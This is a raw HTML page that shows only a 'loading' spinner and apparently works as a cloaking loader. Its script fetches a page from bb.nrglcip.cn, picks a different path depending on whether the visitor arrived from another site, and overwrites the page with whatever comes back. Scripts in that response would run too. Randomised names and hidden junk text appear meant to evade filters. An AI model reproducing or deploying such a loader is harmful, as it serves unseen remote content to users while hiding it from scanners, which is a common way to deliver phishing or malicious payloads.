<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .tvmUBg9 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .tvmUBg9 .Mo0sjz {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .tvmUBg9 .content {
            line-height: 50px;
            text-align: center
        }

        .tvmUBg9 .img {
            width: 100%
        }

        .tvmUBg9 .qXsNInI4mD {
            text-align: center
        }

        .tvmUBg9 .qXsNInI4mD span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .tvmUBg9 .qXsNInI4mD span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .tvmUBg9 .qXsNInI4mD span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .tvmUBg9 .qXsNInI4mD span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .tvmUBg9 .qXsNInI4mD span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .tvmUBg9 .qXsNInI4mD span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .tvmUBg9 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rXVdLT2hQJqP(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var YbNeGP0 = rXVdLT2hQJqP('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ YbNeGP0 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ YbNeGP0 +".html?a=share";
		}
		
        nOroghA=url+"#"+new Date().getTime();
        nOroghA && function() {
            $.get(nOroghA, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>bI4qtj2s1JZPszoAkfrMQKUM7srz7AVooPHWYKn8hBSgzlmzYHWbhqj1JjrVPnxgvwfVDIE99plMb69gC8a5LxAeUQCw</span>
<b style='display:none' >mrRI0Okz5IW53W8z3Njf4zHRMeR367dUJfAOzopjrUTC4aRQzwoXOjoVJZCYKng2fG4yBfbuVn2tbmQd3uyr</b>
<span style='display:none'>bI4qtj2s1JZPszoAkfrMQKUM7srz7AVooPHWYKn8hBSgzlmzYHWbhqj1JjrVPnxgvwfVDIE99plMb69gC8a5LxAeUQCw</span>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>Y4VkwD5tz52Z7qisZ7UNzf3dAiIzoX6nYH1q1izZBrTJdGdHgxTYOzvuDbvcrylDDs63OQu9j9Bw5ieT8K5z706</a>
<span style='display:none'>bI4qtj2s1JZPszoAkfrMQKUM7srz7AVooPHWYKn8hBSgzlmzYHWbhqj1JjrVPnxgvwfVDIE99plMb69gC8a5LxAeUQCw</span>
<a  href='#' style='display:none'>Y4VkwD5tz52Z7qisZ7UNzf3dAiIzoX6nYH1q1izZBrTJdGdHgxTYOzvuDbvcrylDDs63OQu9j9Bw5ieT8K5z706</a>
<li style='display:none' >tfsP5TzPnZoK82e8</li>
<b style='display:none' >mrRI0Okz5IW53W8z3Njf4zHRMeR367dUJfAOzopjrUTC4aRQzwoXOjoVJZCYKng2fG4yBfbuVn2tbmQd3uyr</b><div class="tvmUBg9">
    <div class="Mo0sjz">
        <div class="qXsNInI4mD">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >BUCeTw6CtM3f10LjToQlMfG6t2xDwHzBtS1wq5tttNyIbbI</ul>
<div style='display:none'>Sb9flhfsZpCbC0HHshn5ghAdeufRJ9qIGrv1ppgOEhp9bLyIYq3zZKDSNgIF0LioFF0YHOwIiF</div>
<ul style='display:none' >BUCeTw6CtM3f10LjToQlMfG6t2xDwHzBtS1wq5tttNyIbbI</ul></body>
</html>